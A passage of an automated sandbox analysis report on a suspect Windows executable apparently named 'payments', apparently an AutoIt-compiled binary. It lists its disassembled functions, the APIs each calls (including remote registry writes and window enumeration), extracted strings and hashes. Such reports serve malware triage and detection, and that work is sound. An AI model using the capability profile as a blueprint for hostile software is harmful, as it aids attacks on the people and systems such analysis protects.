                                                                                                                          • Opcode Fuzzy Hash: ce86596c4b33a8864d53ab3a3c0e2bfb40706a1a47607f6040e36ec3fcedcebe
                                                                                                                          • Instruction Fuzzy Hash: BF415A75600308FFDB119F65DC88EAA7BBAEF89711F108058F916D72A0CB309E42CB21
                                                                                                                          Function 00CF3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF3735
                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D2DC00,00000000,?,00000000,?,?), ref: 00CF37A3
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CF37EB
                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CF3874
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00CF3B94
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF3BA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                          • API String ID: 536824911-966354055
                                                                                                                          • Opcode ID: a0da0aeb68461b86e105f761db31e1badefe61f1a309175459485b7febb08af1
                                                                                                                          • Instruction ID: 5021d1e524257f84036edb2f596fafcf7049f25ac249d2bd31fb0a5a5dec7bfa
                                                                                                                          • Opcode Fuzzy Hash: a0da0aeb68461b86e105f761db31e1badefe61f1a309175459485b7febb08af1
                                                                                                                          • Instruction Fuzzy Hash: 11026F75204641AFCB14EF28C855A2EB7E5FF88720F04845DF95A9B3A1DB31EE01DB86
                                                                                                                          Function 00CCCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00CCCF91
                                                                                                                          • __swprintf.LIBCMT ref: 00CCD032
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD045
                                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00CCD09A
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD0D6
                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00CCD10D
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00CCD15F
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CCD195
                                                                                                                          • GetParent.USER32(?), ref: 00CCD1B3
                                                                                                                          • ScreenToClient.USER32(00000000), ref: 00CCD1BA
                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00CCD234
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD248
                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00CCD26E
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD282
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                          • String ID: %s%u
                                                                                                                          • API String ID: 3119225716-679674701
                                                                                                                          • Opcode ID: 2daa42a18840d3f132a118786fea4b71079a1b3f4475b9ba964d99ccc07d9f60
                                                                                                                          • Instruction ID: c3a940ecd9a022e8b97ef31f546de9f081b4420bcd3244aaa28855681a09f544
                                                                                                                          • Opcode Fuzzy Hash: 2daa42a18840d3f132a118786fea4b71079a1b3f4475b9ba964d99ccc07d9f60
                                                                                                                          • Instruction Fuzzy Hash: 38A18F71604306ABD715DF64C884FEAB7A9FF44354F04852DF9AAD2190DB30EE46CBA1
                                                                                                                          Function 00CCD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00CCD8EB
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD8FC
                                                                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CCD924
                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00CCD941
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD95F
                                                                                                                          • _wcsstr.LIBCMT ref: 00CCD970
                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCD9A8
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD9B8
                                                                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CCD9DF
                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCDA28
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCDA38
                                                                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00CCDA60
                                                                                                                          • GetWindowRect.USER32(00000004,?), ref: 00CCDAC9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                          • String ID: @$ThumbnailClass
                                                                                                                          • API String ID: 1788623398-1539354611
                                                                                                                          • Opcode ID: 62a78019bc67a3c7f47e839cd0299b7db36eb4785015be21c36f61e2bd62f802
                                                                                                                          • Instruction ID: 3e799f9114ba1f79facf0d1bff503144ed6d404f020bf636712b0bf95937412b
                                                                                                                          • Opcode Fuzzy Hash: 62a78019bc67a3c7f47e839cd0299b7db36eb4785015be21c36f61e2bd62f802
                                                                                                                          • Instruction Fuzzy Hash: 0D818F31008305ABDB15DF14C885FAA7BE8EF84714F14847EFD9A9A096DB30DE46DBA1
                                                                                                                          Function 00CFCE58 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CFCEFB
                                                                                                                          • DestroyWindow.USER32(?,?), ref: 00CFCF73
                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CFCFF4
                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CFD016
                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFD025
                                                                                                                          • DestroyWindow.USER32(?), ref: 00CFD042
                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C90000,00000000), ref: 00CFD075
                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFD094
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CFD0A9
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CFD0B0
                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CFD0C2
                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CFD0DA
                                                                                                                            • Part of subcall function 00CAB526: GetWindowLongW.USER32(?,000000EB), ref: 00CAB537
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                          • String ID: 0$@U=u$tooltips_class32
                                                                                                                          • API String ID: 3877571568-1130792468
                                                                                                                          • Opcode ID: 310a9e8984e21bfc5ea53b87594a0aea16d75d289124965a80e08ac1c3c0ceb4
                                                                                                                          • Instruction ID: 9e204fe8c1fd50392e28213176f57b71901ce50908496b14a923541dcf1c3393
                                                                                                                          • Opcode Fuzzy Hash: 310a9e8984e21bfc5ea53b87594a0aea16d75d289124965a80e08ac1c3c0ceb4
                                                                                                                          • Instruction Fuzzy Hash: 81719D75140309AFD720CF28CC85FB677E6EB88704F14491DFA96872A1DB70E946DB22
                                                                                                                          Function 00CFF351 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 178windowfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00CFF37A
                                                                                                                            • Part of subcall function 00CFD7DE: ClientToScreen.USER32(?,?), ref: 00CFD807
                                                                                                                            • Part of subcall function 00CFD7DE: GetWindowRect.USER32(?,?), ref: 00CFD87D
                                                                                                                            • Part of subcall function 00CFD7DE: PtInRect.USER32(?,?,00CFED5A), ref: 00CFD88D
                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFF3E3
                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CFF3EE
                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CFF411
                                                                                                                          • _wcscat.LIBCMT ref: 00CFF441
                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CFF458
                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFF471
                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFF488
                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFF4AA
                                                                                                                          • DragFinish.SHELL32(?), ref: 00CFF4B1
                                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CFF59C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                                                                                          • API String ID: 169749273-762882726
                                                                                                                          • Opcode ID: 4265af51325d50c53bbc5fbcb7e579e2f2d35c67120c5964a0f6a95b000fe2f5
                                                                                                                          • Instruction ID: 6a4c0bb16b83533927a2a6e4fc33d0f1347c9b0d17d7862867658523f53b887b
                                                                                                                          • Opcode Fuzzy Hash: 4265af51325d50c53bbc5fbcb7e579e2f2d35c67120c5964a0f6a95b000fe2f5
                                                                                                                          • Instruction Fuzzy Hash: 67615D71108305AFC711EF64CC85EAFBBF9EF89714F00491DF695922A1DB70960ADB62
                                                                                                                          Function 00CCD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __wcsnicmp
                                                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                          • API String ID: 1038674560-1810252412
                                                                                                                          • Opcode ID: ca414d14eba312e7e36a0f7cbed93705db5b01c09fed8420027f721e827250d3
                                                                                                                          • Instruction ID: 2af50c59090ad7720fc19eb2c8d1b2f2bf5b5e39f942b5bdb70bb367af145f31
                                                                                                                          • Opcode Fuzzy Hash: ca414d14eba312e7e36a0f7cbed93705db5b01c09fed8420027f721e827250d3
                                                                                                                          • Instruction Fuzzy Hash: 18314C31A44209ABDF15EA60DD97FFEB3749F20714FA00139F452B10E9EB61AF09E661
                                                                                                                          Function 00CE79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00CE79C6
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00CE79D1
                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00CE79DC
                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00CE79E7
                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00CE79F2
                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00CE79FD
                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00CE7A08
                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00CE7A13
                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00CE7A1E
                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00CE7A29
                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00CE7A34
                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00CE7A3F
                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00CE7A4A
                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00CE7A55
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00CE7A60
                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00CE7A6B
                                                                                                                          • GetCursorInfo.USER32(?), ref: 00CE7A7B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor$Load$Info
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2577412497-0
                                                                                                                          • Opcode ID: 82ce57cb47d4cb3aebc31ea5510af29d60169da360be7d72e658a20f6e4c8c7b
                                                                                                                          • Instruction ID: fccf73709226be071945efd1d9166fae0f83395385f11ff86f01ab774e81519b
                                                                                                                          • Opcode Fuzzy Hash: 82ce57cb47d4cb3aebc31ea5510af29d60169da360be7d72e658a20f6e4c8c7b
                                                                                                                          • Instruction Fuzzy Hash: C93113B0D0831A6ADB109FB69C8999FBFE8FF04754F50453AE50DE7280DA78A5008FA1
                                                                                                                          Function 00C9C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C9C8B7,?,00002000,?,?,00000000,?,00C9419E,?,?,?,00D2DC00), ref: 00CAE984
                                                                                                                            • Part of subcall function 00C9660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C953B1,?,?,00C961FF,?,00000000,00000001,00000000), ref: 00C9662F
                                                                                                                          • __wsplitpath.LIBCMT ref: 00C9C93E
                                                                                                                            • Part of subcall function 00CB1DFC: __wsplitpath_helper.LIBCMT ref: 00CB1E3C
                                                                                                                          • _wcscpy.LIBCMT ref: 00C9C953
                                                                                                                          • _wcscat.LIBCMT ref: 00C9C968
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C9C978
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00C9CABE
                                                                                                                            • Part of subcall function 00C9B337: _wcscpy.LIBCMT ref: 00C9B36F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                          • API String ID: 2258743419-1018226102
                                                                                                                          • Opcode ID: b2711d3e0355ac79934f63f0b6edc127a77616fc2acd13fc14db84def3ab1f87
                                                                                                                          • Instruction ID: d5e086e72f1772c2a62e7a64c8777647b03d34fc75f4f29a2673494a7d952514
                                                                                                                          • Opcode Fuzzy Hash: b2711d3e0355ac79934f63f0b6edc127a77616fc2acd13fc14db84def3ab1f87
                                                                                                                          • Instruction Fuzzy Hash: 0712B2715083419FCB24EF64C885AAFBBF9BF99304F04491EF58993291DB30DA49DB62
                                                                                                                          Function 00CF716A Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 244windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00CF71FC
                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CF7247
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                                          • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                          • API String ID: 3974292440-383632319
                                                                                                                          • Opcode ID: 1d31bde82c26989bc2f542539cdc6ec1d7aa6cd446b496140e15297a1e0e57bd
                                                                                                                          • Instruction ID: 5ef721473305e05c82a798a12452430e50b45517714dd20d58098c74db6c79fd
                                                                                                                          • Opcode Fuzzy Hash: 1d31bde82c26989bc2f542539cdc6ec1d7aa6cd446b496140e15297a1e0e57bd
                                                                                                                          • Instruction Fuzzy Hash: 7C9194342087059FCB04EF24C891A6EB7A1BF55314F00495DF9966B3A3DB31ED4AEB92
                                                                                                                          Function 00CFE4F5 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 199windowlibraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CFE5AB
                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CF9808,?), ref: 00CFE607
                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE647
                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE68C
                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE6C3
                                                                                                                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00CF9808,?), ref: 00CFE6CF
                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CFE6DF
                                                                                                                          • DestroyIcon.USER32(?), ref: 00CFE6EE
                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CFE70B
                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CFE717
                                                                                                                            • Part of subcall function 00CB0FA7: __wcsicmp_l.LIBCMT ref: 00CB1030
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                          • String ID: .dll$.exe$.icl$@U=u
                                                                                                                          • API String ID: 1212759294-1639919054
                                                                                                                          • Opcode ID: 9d09b2971fe61ac1afc80d6966012155b6857c2770e432a60a9fcbb89879c341
                                                                                                                          • Instruction ID: 1f2a65fb0265d179c54924036c43627e3ce9a2ea1a1bda319823fddc279b925d
                                                                                                                          • Opcode Fuzzy Hash: 9d09b2971fe61ac1afc80d6966012155b6857c2770e432a60a9fcbb89879c341
                                                                                                                          • Instruction Fuzzy Hash: 4961C37150031DBAEB24DF64CC46FFE7BA8BB18724F108115FA25E61E0EB749A80DB61
                                                                                                                          Function 00CDAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00CDAB3D
                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00CDAB46
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CDAB52
                                                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00CDAC40
                                                                                                                          • __swprintf.LIBCMT ref: 00CDAC70
                                                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00CDAC9C
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CDAD4D
                                                                                                                          • SysFreeString.OLEAUT32(00000016), ref: 00CDADDF
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CDAE35
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CDAE44
                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00CDAE80
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
